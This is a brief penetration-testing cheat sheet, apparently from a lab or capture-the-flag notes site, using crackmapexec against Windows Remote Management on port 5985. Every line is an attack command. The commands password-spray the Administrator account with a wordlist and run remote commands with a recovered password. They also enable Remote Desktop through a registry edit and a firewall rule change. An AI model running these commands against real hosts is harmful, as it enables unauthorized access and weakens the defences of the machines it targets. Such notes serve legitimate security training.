crackmapexec
// winrm on port 5985 - windows remote management
// PORT STATE SERVICE
// 5985/tcp open wsman
crackmapexec winrm ip -d local -u administrator -p top100.txt
crackmapexec winrm -d . -u Administrator -p 'badminton' -x "whoami" 10.129.245.141
crackmapexec winrm -d . -u Administrator -p 'badminton' -x 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f' 10.129.81.200
crackmapexec winrm -d . -u Administrator -p 'badminton' -x 'netsh advfirewall firewall set rule group="remote desktop" new enable=yes' 10.129.81.200
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=yes
Last updated
Was this helpful?